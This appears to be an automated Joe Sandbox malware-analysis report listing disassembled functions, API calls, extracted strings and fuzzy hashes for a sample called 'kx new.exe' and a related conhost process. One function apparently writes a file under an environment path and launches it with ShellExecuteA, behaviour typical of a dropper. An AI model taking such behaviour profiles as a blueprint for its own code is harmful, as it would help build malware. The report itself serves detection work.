Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 7f1400b797cedca6b16a3af2328859c72fc7d201440333d75b27cd56064353ab
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: B5F0127121160581EF148B2CE4653996360EFC5F61F990219DAAA471F4DFACC56DC7C3

Function 0000019A498050D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000019A49805156

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction ID: 87bb582ceeb14a71fb0b9cf79bb49cf314316caa3053ea11c1f830c5c3c6b50a
Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction Fuzzy Hash: DE02FE32619B8486E760CB5AF49079AB7A0F7C5B80F550015EACE47BA8DFBCC458CF52

Function 0000019A49805710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000019A49805726

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction ID: a0f15374be1fafb4abe1d7826e88ea18014ff4279ce8a437edb09c3b702d1e27
Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction Fuzzy Hash: C3613E36118B44C6E760CB1AE46475E77A0F7C9B84F950115EA8E43BA8DBBCC468CF93

Function 0000019A497E3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000019A497E352C
_set_statfp.LIBCMT ref: 0000019A497E3547
_set_statfp.LIBCMT ref: 0000019A497E3563
_set_statfp.LIBCMT ref: 0000019A497E359F

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: f294e2d8a0763c7dcca65170a035a102959bb6516f637d8402315d813bedcd36
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 8F11A332A10A1111FEE45538E4713E911C16FD9B74FCC8638A97E0B3E6CAE8C87D4382

Function 0000019A49814104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000019A4981412C
_set_statfp.LIBCMT ref: 0000019A49814147
_set_statfp.LIBCMT ref: 0000019A49814163
_set_statfp.LIBCMT ref: 0000019A4981419F

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: a34f8e5019194e6d20d766b0e5f80edf4312116f95ed2c457afdaedb587612af
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 13119132A18A5111F66C1E7CE4733E511406FE9BF8FDC0625A976476D68BE4C8AA42C3

Function 0000019A497DF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000019A497DF124

Strings

or copy constructor iterator', xrefs: 0000019A497DF25A, 0000019A497DF275
Tuesday, xrefs: 0000019A497DF0F4
Wednesday, xrefs: 0000019A497DF1ED

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: fea095b42ecc100f73ed76f24746f5af054c34e1799ae75f2706fb8b7795d38d
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: D861C43266064042FA658B68E5603EE6AA2EFC6F40FDC4715CA0E17794DBB5D87D83C3

Function 0000019A4980AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000019A4980AA68
_CallSETranslator.LIBVCRUNTIME ref: 0000019A4980AAB7

Strings

RCC, xrefs: 0000019A4980AA85
MOC, xrefs: 0000019A4980AA7C

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 910dd0644204460932afc774496e4adba09f489cfeaad10c45dea0d487860a31
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 30617E33600B448AE720DF69D4547DD77E0FB84B88F494215EF4A17B98DBB8C5A9C782

Function 0000019A497DA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000019A497DA1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000019A497DA288

Strings

csm, xrefs: 0000019A497DA1C2
csm, xrefs: 0000019A497DA2DA

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: b8923c6eec482e3861280229c2910a6a01e5bfe3d9eb113536725d486cb54f56
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 00518032100280CAEB688B2695643987BA1FBD5F84F9C4315DB9D47BD5CBB9D478C782

Function 0000019A4980AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000019A4980ADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000019A4980AE88

Strings

csm, xrefs: 0000019A4980AEDA
csm, xrefs: 0000019A4980ADC2

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: f255c9043e0841a50e92e706ea7012208235f75df427cbaed7ab14043d795f9d
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 5F518E721002808AEB748F6994A839977E0FB94F84F9D4115DB9947BD5CBB8D478C783

Function 0000019A497D8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000019A497D8413
_IsNonwritableInCurrentImage.LIBCMT ref: 0000019A497D84A8

Strings

csm, xrefs: 0000019A497D848E
f, xrefs: 0000019A497D8426

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: fad40bdf7da6bcae9f4323cba3989db6887887c807032d4075d1549b3d921be4
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 6951D43270120086DB54CF15D414BD937A5FB90F98F998224DA5F43788EBB8DD78C786

Function 0000019A497D83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000019A497D8413
_IsNonwritableInCurrentImage.LIBCMT ref: 0000019A497D84A8

Strings

csm, xrefs: 0000019A497D848E
f, xrefs: 0000019A497D8426

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: 536c385735ca2a64a10becc9699eb9d47b8e3b4b9a41c7b742be340cf94dba9e
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 0231AF3120164096EB54DF11E8547D937A8FB80F88F898214EE5B07784DBBCC978C786

Function 0000019A49812058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000019A498120D7
WriteFile.KERNEL32 ref: 0000019A4981239F
WriteFile.KERNEL32 ref: 0000019A498123E5
GetLastError.KERNEL32 ref: 0000019A4981249B

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: 7834a4dfc4659904e1234c0e5b698e7c7b9b4d58cfa958d79a683019ffbdc685
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: BBD1E332714A8089E711CF69D4503DC3BB1FB94B98F984216CE5E97B99DBB4C42AC3C6

Function 0000019A498014A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000019A498014C5
HeapFree.KERNEL32 ref: 0000019A498014D4
GetProcessHeap.KERNEL32 ref: 0000019A498014E1
HeapFree.KERNEL32 ref: 0000019A498014F0
GetProcessHeap.KERNEL32 ref: 0000019A49801500

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
Instruction ID: db9cc38fb0fd0fd1d16bc80fbf27160a659cbe078d980761268a28c55b338b55
Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
Instruction Fuzzy Hash: 64015E32600F90C6D708DF6AE91518E77B1FB89F81F484425EA8943729DF78C465C7C2

Function 0000019A49812980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 0000019A49812A9C
GetLastError.KERNEL32 ref: 0000019A49812B27

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: 2b87452e8a2e49fdbbf97a7b9e19cdb6db8bebdfc1f234b877c0fee6c18721f7
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: 5491F37270065085F760DF2D94627ED2BA0FB94F88F9C4109DE4A67694CBB8C4AAC3C3

Function 0000019A4980253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000019A49802620
StrCpyW.SHLWAPI ref: 0000019A49802639

Strings

\\.\pipe\, xrefs: 0000019A4980262B

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: 9a8afaf80fad37418c58c16810faeebf007dbffc6895f6fd6989cf508ba2373e
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: D671E53620078185E7249F2D98643EA67A4FBC5F84FCA0116DE0A43B89DFF5C669C783

Function 0000019A497D9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000019A497D9EB7

Strings

RCC, xrefs: 0000019A497D9E85
MOC, xrefs: 0000019A497D9E7C

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 965174dac6185b192a24f5038359a7ecae64b3d8a16d5e9078e4bededc9e25f2
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: D9615533601A848AEB20DF65D4903DD77A0FB88F88F584215EE4D17B99DBB8D1A9C781

Function 0000019A49802330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000019A49802416
StrCpyW.SHLWAPI ref: 0000019A4980242D

Strings

\\.\pipe\, xrefs: 0000019A49802421

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: 4de147e3c72983a59083b9aa10c365b65f999c79e391568a3eabf078bcf9e6c3
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: 2A51E232604B8185E6A4DA2DA0783EA6755FBC5F80FCE0125DE4903B99CBF9C52C87C3

Function 0000019A498126F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000019A49812807
GetLastError.KERNEL32 ref: 0000019A49812829

Strings

U, xrefs: 0000019A498127B3

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: 1ddd89d3273077dc7820a653ce1de987e56a7ceef8793438194b87c4c00f5d0c
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: E941E872314A8086DB20CF29E4553DA77A0FBD8B94F844021EE4E87798DBBCC455C7C2

Function 0000019A498094A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000019A498094F0
RaiseException.KERNEL32 ref: 0000019A49809531

Strings

csm, xrefs: 0000019A4980951E

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: b25a908294b73ef63bb52b4bb927f807a99cc5b85861d22033e407a51e74b54f
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: BF114932204B8082EB208B19E450299B7E4FBC8F94F994264EBCC07758DF79C965CB41

Function 0000019A497D7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 0000019A497D737C

Strings

riptor at (, xrefs: 0000019A497D7364
ierarchy Descriptor', xrefs: 0000019A497D7381

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 2990852797fe387591d5b5b8e5f1ddbf6737eadc46c0566ce875acfc617ef091
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: F1E08671640B4990DF028F62E8502D833A0DFD8F64B8C9122995C07311FA7CD1FDC341

Function 0000019A497D73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 0000019A497D73D8

Strings

riptor at (, xrefs: 0000019A497D73C0
Locator', xrefs: 0000019A497D73DD

Memory Dump Source

Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: ca308a2d7f9d06010a92b7ab7c036669e45a5b2b06f91dae3968c26cf3c1f6d4
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: BBE08671600B4880DF028F61E4502D87360EB98F64BCC9122C95C07311EA7CD1F9C341

Function 0000019A49801268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000019A4980126E
HeapAlloc.KERNEL32 ref: 0000019A4980127D
GetProcessHeap.KERNEL32 ref: 0000019A49801297
HeapAlloc.KERNEL32 ref: 0000019A498012A8

Memory Dump Source

Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: 84b3a6a7c66daf5af35c7e3426cc77c91b5f3c8144fc363aaf6171ba13fbe17f
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 57E0397560160486EB098B66E82938A36E1EB89F06F898024898907351DFBD88A9C7D2

Analysis Process: kx new.exePID: 1020, Parent PID: 5516COMMON

Execution Graph

Execution Coverage:	80.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	28
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004014D1 Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004014EB
SetUnhandledExceptionFilter.KERNEL32(004014AF), ref: 004014F9
__set_app_type.MSVCRT ref: 00401504
_controlfp.MSVCRT ref: 00401518
__getmainargs.MSVCRT ref: 00401546
exit.MSVCRT ref: 00401578

Memory Dump Source

Source File: 00000004.00000002.2127266229.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2127119958.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2127469455.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2127469455.0000000000E02000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2142731863.0000000000E73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_kx new.jbxd

Similarity

API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 3649950142-0
Opcode ID: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
Instruction ID: 276d267c830fb1744484ad8078350a7426bd4a7cdf1eb4e40a6b3a9487509305
Opcode Fuzzy Hash: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
Instruction Fuzzy Hash: 2B11ECF5A00204AFCB00EBA9DC55F4A73ECE748304F144475F909F7361E579E9888B65

Function 0040108C Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 239
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

ShellExecuteA.SHELL32(?,?,?,00000000), ref: 004010F3
memset.MSVCRT ref: 00401108
memset.MSVCRT ref: 00401150
strcmp.MSVCRT ref: 004011E2
strcpy.MSVCRT(?,00000000), ref: 00401230
getenv.MSVCRT ref: 0040126D
sprintf.MSVCRT ref: 004012BF
fopen.MSVCRT ref: 004012D4
fwrite.MSVCRT ref: 00401339
fclose.MSVCRT ref: 00401348
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 004013A0

Strings

! @, xrefs: 0040109C
`!@, xrefs: 00401110
%s\%s, xrefs: 004012B2, 004012B7
& @, xrefs: 004010B0
1 @, xrefs: 004010C7
e!@, xrefs: 00401118
t!@, xrefs: 00401120

Memory Dump Source

Source File: 00000004.00000002.2127266229.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2127119958.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2127469455.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2127469455.0000000000E02000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2142731863.0000000000E73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_kx new.jbxd

Similarity

API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: ! @$%s\%s$& @$1 @$`!@$e!@$t!@
API String ID: 3236948872-2690058073
Opcode ID: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
Instruction ID: 915970d7f8feda4f52418ac8c3b3d67a18a16e2b2df1165333ea2636041f6ec6
Opcode Fuzzy Hash: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
Instruction Fuzzy Hash: 888101F1E001149BDB54DBACDC45B9E77A9EB48309F040579F109FB392E63DAE448B68

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

/>pj)w^wi!p&370^jskbtm-=lzrjeh2*, xrefs: 0040106E

Memory Dump Source

Source File: 00000004.00000002.2127266229.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2127119958.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2127469455.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2127469455.0000000000E02000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2142731863.0000000000E73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_kx new.jbxd

Similarity

API ID: malloc
String ID: />pj)w^wi!p&370^jskbtm-=lzrjeh2*
API String ID: 2803490479-4076278676
Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

Function 0040145B Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`:vD`:v, xrefs: 00401494, 00401499
D`:vD`:v, xrefs: 0040146D, 00401470

Memory Dump Source

Source File: 00000004.00000002.2127266229.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2127119958.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2127469455.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2127469455.0000000000E02000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2142731863.0000000000E73000.00000002.00000001.01000000.00000006.sdmpDownload File

